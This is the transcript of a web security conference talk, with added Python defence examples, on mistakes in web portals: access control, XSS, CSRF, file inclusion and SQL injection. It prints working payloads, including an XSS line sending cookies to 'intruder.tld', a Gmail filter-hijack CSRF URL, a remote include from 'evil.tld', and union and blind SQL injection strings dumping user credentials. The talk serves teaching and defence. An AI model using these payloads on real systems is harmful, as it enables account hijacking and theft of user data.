Minor Mistakes In Web Portals
Michal Sobiegraj and Borys Lacki
Published in: Business
Transcript

  • 1. Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
  • 2.  Why is Web important? M
  • 3.  Web is everywhere M
  • 4.   We spend money  We manage our finances  We earn money  We waste our time M
  • 5.  Internet traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 6.  2007: Web traffic has finally overtaken P2P M
  • 7.  Web has beaten pr0n! YAY!* * not supported by any research M
  • 8.  HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 9.  Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
  • 10.  Web security in a nutshell M
  • 11.  Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
  • 12.  Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
  • 13.  Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
  • 14.  Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
  • 15.  Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 16. Application Firewall vs. proper architecture, coding and SDLC Internet Web Application Firewall WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 17.  The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
  • 18.  Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  • 19.  Information disclosure B
  • 20.  A funny story ;-) B
  • 21.  More pics hmm… B
  • 22.  B
  • 23.  :-D B
  • 24.  Downloaded… B
  • 25.  Connecting… B
  • 26.  PWND ;-) B
  • 27.  Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
  • 28.  Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
  • 29.  Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  • 30.  Solution: Server side access control B
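The server-side check slide 30 calls for, as an added Python example (not code from the presentation); the message store, user IDs and function names are constructed for illustration:

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Message:
    msgs_id: int
    owner_id: int
    body: str


# Constructed sample data: sequential IDs like the msgs_id=80, 81, 82 URLs
# on the slide, each message belonging to a different user.
MESSAGES = {
    80: Message(80, 100, "hello from user 100"),
    81: Message(81, 101, "private note of user 101"),
    82: Message(82, 102, "private note of user 102"),
}


class Forbidden(Exception):
    """Raised when the session user may not read the requested object."""


def get_message(session_user_id: int, msgs_id: int) -> str:
    """Return a message body only if it belongs to the logged-in user.

    session_user_id comes from the server-side session, never from a URL
    parameter, hidden form field or cookie value the client can edit.
    """
    msg = MESSAGES.get(msgs_id)
    # One response for "no such message" and "not yours", so walking through
    # msgs_id values does not reveal which IDs exist.
    if msg is None or msg.owner_id != session_user_id:
        raise Forbidden(f"msgs_id={msgs_id}")
    return msg.body


def rss_path(session_user_id: int) -> str:
    """Derive the feed path from the session instead of a client-chosen ID."""
    return f"/rss/{session_user_id}_rss.xml"


def handle_request(session_user_id: int, params: dict) -> tuple[int, str]:
    """Minimal dispatcher for index.php?p=ok&action=msgs2&msgs_id=N."""
    if params.get("action") != "msgs2":
        return 404, "unknown action"
    try:
        msgs_id = int(params.get("msgs_id", ""))
        return 200, get_message(session_user_id, msgs_id)
    except ValueError:
        return 400, "bad msgs_id"
    except Forbidden:
        return 403, "forbidden"
```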
  • 31.  Cross-Site Scripting (XSS) B
  • 32.  Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
  • 33.  Example XSS code document.write('<img src="http://intruder.tld/cookiemonster.gif?'+escape(document.cookie)+'">'); B
  • 34.  Content alteration through an XSS attack B
  • 35.  Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById("logo").innerHTML="<img src='http://www.srv.tld/images/smiley.gif'>" M
  • 36.  This is how it looks in the webpage code ... <div id="maincontent"> <h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));</script></span></h2> </div> ... M
  • 37.  The code that is to be changed <div id="logo"> <div class="logolink"> <a href="http://server.tld/">server.tld</a> </div> ... </div> M
  • 38.  The code in a Web browser M
  • 39.  Final outcome M
  • 40.  Rendered in a browser M
  • 41.  Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
  • 42.  Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 200 OK Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
  • 43.  Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 200 OK Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
  • 44.  Session cookie hijacking http://www.server.tld/index.php?p=comments&comments_login=smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none) M
  • 45.  M
  • 46.  M
  • 47.  M
  • 48.  How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Example: <img src="http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D258102041%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29"> B
  • 49.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
  • 50.  http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
  • 51. http://server.tld/topics/<img src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f → / M
  • 52. http://server.tld/topics/<img src=http:%252f%252fwww.serv.tld%252fimages%252fsmiley.gif> %252f → %2f → / M
  • 53.  B
  • 54.  Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
  • 55.  Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
  • 56.  Session ID hijack B
  • 57.  XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
  • 58.  XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
  • 59.  XSS Worm Web Server Stores the XSS in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
  • 60.  Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  • 61.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
  • 62.  Cross-Site Request Forgery (CSRF) B
  • 63.  CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
  • 64.  Useful in getting to know your users a wee bit better… <img src="http://nasza-klasa.pl/invite/1?i=1"> (/var/log/apache/fbi_cia_what-not_access.log) B
  • 65.  Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
  • 66.  What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  Vulnerability-free code!!! B
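The "additional temporary ID" of slide 66, with the ID-key association held on the server and the token tied to one session, as an added Python example (not the presentation's code); the token store, TTL, item store and handler name are assumptions:

```python
from __future__ import annotations

import secrets
import time

# Server-side store: session_id -> {token: expiry}. The association between
# a session and its keys lives here, never only in the client's cookie or HTML.
_TOKENS: dict[str, dict[str, float]] = {}
TOKEN_TTL = 600.0  # seconds a token stays valid (assumed value)


def issue_csrf_token(session_id: str, now: float | None = None) -> str:
    """Mint a long unpredictable key for this session and remember it."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _TOKENS.setdefault(session_id, {})[token] = now + TOKEN_TTL
    return token


def consume_csrf_token(session_id: str, token: str, now: float | None = None) -> bool:
    """Accept the token once, for this session only, and only before expiry."""
    now = time.time() if now is None else now
    bucket = _TOKENS.get(session_id, {})
    expiry = bucket.pop(token, None)  # single use: gone after the first check
    return expiry is not None and now <= expiry


# Constructed item store standing in for the delete.php?id=34 endpoint.
ITEMS = {34: "photo", 35: "comment"}


def handle_delete(session_id: str, method: str, params: dict) -> tuple[int, str]:
    """POST-only and token-checked version of delete.php.

    Method and Referer checks alone are weak (slide 66); the token is what a
    cross-site page cannot obtain, so it is the check that actually matters.
    """
    if method != "POST":
        return 405, "method not allowed"
    if not consume_csrf_token(session_id, params.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    try:
        item_id = int(params["id"])
    except (KeyError, ValueError):
        return 400, "bad id"
    if ITEMS.pop(item_id, None) is None:
        return 404, "no such item"
    return 200, "Item deleted!"
```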
  • 67.  PHP File Include B
  • 68.  Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists("includes/$page.inc")) { include "includes/$page.inc"; } else { echo "In construction!<BR>"; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00 B
  • 69.  Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php"); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_absolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803" access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76" B
  • 70.  What can we do?  Harden the application server (e.g. in php.ini) allow_url_fopen = Off allow_url_include = Off register_globals = Off safe_mode = On safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
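Slides 49 to 52 (filtering "in depth": `....//` surviving a single pass, `%252f` decoding to `/`) and slides 68 and 70 (the `../` and null-byte include) share one defence, shown here as an added Python example that is not the presentation's code: decode until stable, reject the null byte, white-list the page name, then confirm the canonical path stays under the include directory. INCLUDE_DIR and the helper names are assumptions.

```python
from __future__ import annotations

import os
import re
import urllib.parse

# Assumed location of the "includes/$page.inc" files from slide 68.
INCLUDE_DIR = os.path.realpath("/srv/app/includes")
# White-list: only what a page name legitimately needs, nothing else.
PAGE_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def strip_traversal_once(value: str) -> str:
    """Single-pass filter: '....//' survives as '../' (slide 49's example)."""
    return value.replace("../", "")


def strip_traversal(value: str) -> str:
    """In-depth variant: repeat until nothing changes any more."""
    while True:
        stripped = value.replace("../", "")
        if stripped == value:
            return value
        value = stripped


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """URL-decode until stable, so %252f -> %2f -> / is seen as a slash."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_page(page_param: str) -> str:
    """Map ?page=... to a file path, or raise ValueError.

    Order matters: decode first (so the checks see what PHP would see),
    then reject the null byte that truncates the '.inc' suffix, then
    white-list, then confirm the canonical path is still under INCLUDE_DIR.
    """
    name = decode_fully(page_param)
    if "\x00" in name:
        raise ValueError("null byte in page name")
    if not PAGE_RE.match(name):
        raise ValueError("page name not in white-list")
    path = os.path.realpath(os.path.join(INCLUDE_DIR, name + ".inc"))
    if os.path.commonpath([INCLUDE_DIR, path]) != INCLUDE_DIR:
        raise ValueError("resolved path leaves the include directory")
    return path
```

The white-list alone would already reject every sample below; the realpath check is the second layer, for the day the white-list is loosened.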
  • 71.  SQL Injection M
  • 72.  SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1' or 1='1 Web Application Intruder select * from users where login='admin' and pass='1' or 1='1' Welcome admin! Database $dane = db_exec("select * from users where login='$login' and pass='$pass'") if ($dane.count) { print("Welcome $login") … } else { print("Bye"); exit(0); } M
  • 73. POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='"1&w_city="'asd&submit=Szukaj M
  • 74. priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
  • 75.  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  • 76.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  • 77.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submit=Szukaj M
  • 78.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submit=Szukaj M
  • 79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
  • 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  • 81.  Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
  • 82. Another discovery:  There are 1836 bots :-) M
  • 83.  Blind SQL Injection Registration form: ' B
  • 84.  Blind SQL Injection (experimenting)  1' and 1='0 → OK  1' or 1='1 → This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)# → delay → user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)# → no delay B
  • 85.  Products 1-8 of 8 B
  • 86.  Product database for selected category is empty B
  • 87.  Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
  • 88.  Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
  • 89.  What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
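Slide 72's string-built login query next to its parameterised form, plus the server-side check behind a selection list that slide 89 says not to trust, as an added Python example (not the presentation's code). The SQLite table, the city list and the `' or '1'='1` payload (quotes placed so SQLite compares text with text) are constructed for the demo.

```python
from __future__ import annotations

import sqlite3

# Slide 89: a selection list in the HTML form is not a filter. The server keeps
# its own copy of the allowed values and checks against that. (Constructed list.)
ALLOWED_CITIES = {"Warszawa", "Kraków", "Cała Polska"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the portal's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (login text, pass text, city text)")
    conn.execute("insert into users values ('admin', 's3cret', 'Cała Polska')")
    conn.execute("insert into users values ('user', 'asd12ed]r3', 'Warszawa')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Slide 72's pattern: the query text is built by string interpolation,
    so a quote inside the password becomes SQL syntax."""
    sql = f"select * from users where login='{login}' and pass='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Parameterised query: the driver sends the values apart from the SQL
    text, so a quote in the password stays data."""
    sql = "select * from users where login=? and pass=?"
    return conn.execute(sql, (login, password)).fetchone() is not None


def search_by_city(conn: sqlite3.Connection, w_city: str) -> list[str]:
    """The w_city parameter from slides 73 to 80, validated against the
    server's own white-list before it reaches a (parameterised) query."""
    if w_city not in ALLOWED_CITIES:
        raise ValueError("w_city is not one of the selection-list values")
    rows = conn.execute("select login from users where city=?", (w_city,))
    return [login for (login,) in rows.fetchall()]
```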
  • 90.  Conclusion M
  • 91.  Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
  • 92.  What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
  • 93.  Be aware of potential threats  Listen and ask  Use professional assistance  Perform a cost-benefit analysis  Every piece of feedback is worth listening to M
  • 94.  Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
  • 95.  Hardening Proper configuration is key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
  • 96.  Think! No technical control will protect you from logical errors M
  • 97. michal@sobiegraj.com b.lacki@logicaltrust.net Questions?